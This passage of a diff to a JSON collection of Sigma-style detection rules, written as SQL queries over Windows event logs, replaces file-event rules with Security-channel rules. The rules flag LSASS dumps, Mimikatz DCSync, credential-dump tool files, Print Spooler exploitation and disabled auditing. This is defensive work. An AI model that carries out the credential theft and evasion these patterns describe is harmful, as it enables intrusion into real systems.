(TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Companies, who may use these default LDAP-Attributes for personal information" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", - "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", + "attack.discovery", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Unlikely" + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", - "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": 
"INIT_6", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, 
that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName 
= '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR 
(SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", "status": "test", 
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1053", + "attack.s0111" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, 
oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive 
and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename 
LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 
'%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE 
'%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName 
LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. 
